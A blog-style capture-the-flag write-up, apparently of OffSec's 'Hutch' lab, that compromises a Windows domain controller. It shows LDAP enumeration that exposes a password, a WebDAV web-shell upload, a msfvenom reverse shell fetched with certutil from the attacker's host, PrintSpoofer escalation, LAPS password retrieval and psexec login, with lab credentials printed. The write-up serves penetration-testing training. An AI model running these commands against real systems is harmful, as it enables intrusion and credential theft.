Post

Hutch Write up

Welcome to my Hutch Write-up

Recon

$ sudo nmap -sSVC -A -oA nmap 192.168.191.122


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 06:10 EDT
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-webdav-scan: 
|   Server Date: Sun, 08 Oct 2023 10:13:41 GMT
|   WebDAV type: Unknown
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/10.0
|_  Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-10-08 10:11:16Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

ALL PORTS SCAN

$ nmap -p- --min-rate=20000 192.168.191.122


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 06:12 EDT
Nmap scan report for 192.168.191.122

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49672/tcp open  unknown
49674/tcp open  unknown
49687/tcp open  unknown
49759/tcp open  unknown

UDP PORTS SCAN

$ sudo nmap -sU -Pn --min-rate=5000 192.168.191.122


1
2
3
4
5
6
7
8
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 06:10 EDT
Nmap scan report for 192.168.191.122

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

Ldap enumeration using nmap:

$ nmap -n -sV --script "ldap* and not brute" 192.168.191.122


image 0

NOTE: the following commands didn’t work for me

$ ldapsearch -x -h 192.168.191.122 -D '' -w '' -b "DC=hutch,DC=offsec" | grep sAMAccountName:


image 1

$ ldapsearch -x -H 192.168.191.122 -D '' -w '' -b "DC=hutch,DC=offsec" | grep sAMAccountName:


image 2

Run this instead:

$ ldapsearch -x -H ldap://192.168.191.122 -D '' -w '' -b "DC=hutch,DC=offsec" | grep sAMAccountName:


image 3

Let’s save all these users in a file.

image 4

$ ldapsearch -x -H ldap://192.168.191.122 -D '' -w '' -b "DC=hutch,DC=offsec" | grep description


image 5

‘Password set to CrabSharkJellyfish192 at user’s request. Please c’

Passwd:CrabSharkJellyfish192

$ crackmapexec smb 192.168.191.122 -u users.txt -p CrabSharkJellyfish192


image 6

Let’s enumerate smb using the credentials we found.

$ smbclient -L 192.168.191.122 -U fmcsorley --password='CrabSharkJellyfish192'


image 7

Looks like the default shares, I tried checking them out but I didn’t find anything interesting.

Intitial Foothold

image 8

$ cadaver http://192.168.191.122


Username: fmcsorley Password:CrabSharkJellyfish192

We can upload a cmdasp.aspx into the webapp running on port 80.

dav:/> put cmdasp.aspx


image 9

http://192.168.191.122/cmdasp.aspx

image 10

Note: Instead of cadaver we could have also used: curl -T ‘/home/kali/shell.aspx’ ‘http://192.168.191.122/’ -u fmcsorley:CrabSharkJellyfish192

gif1

Let’s generate a rev shell using msfvenom and upload it using certutil.

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.158 LPORT=1234 -f exe > shell1.exe


certutil.exe -urlcache -split -f http://192.168.45.158:5985/shell1.exe c:\users\public\shell.exe


c:\users\public\shell.exe


image 11

Privilege Escalation

c:\windows\system32\inetsrv>whoami /priv


image 12

SeImpersonatePrivilege is enabled which means we can use printspoofer or Juicypotato (if printspoofer fails)

c:\windows\system32\inetsrv>certutil -urlcache -split -f http://192.168.45.158:5985/PrintSpoofer64.exe c:\users\public\printspoofer.exe


c:\windows\system32\inetsrv>c:\users\public\printspoofer.exe -i -c powershell.exe


image 13

PS C:\users\fmcsorley\desktop> type local.txt ;whoami ;hostname ;ipconfig


image 14

PS C:\users\administrator\desktop> type proof.txt ;whoami ;hostname ;ipconfig


image 15

Second Method:

This one is actually much more easier.

gif 2

$ ldapsearch -x -H ldap://192.168.191.122 -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b 'dc=hutch,dc=offsec' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd


image 16

administrator:G.5#w6MOz34lqW

$ crackmapexec smb 192.168.191.122 -d hutch.offsec -u administrator -p 'G.5#w6MOz34lqW'

image 17

$ python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:G.5#w6MOz34lqW@192.168.191.122

image 18

This post is licensed under CC BY 4.0 by the author.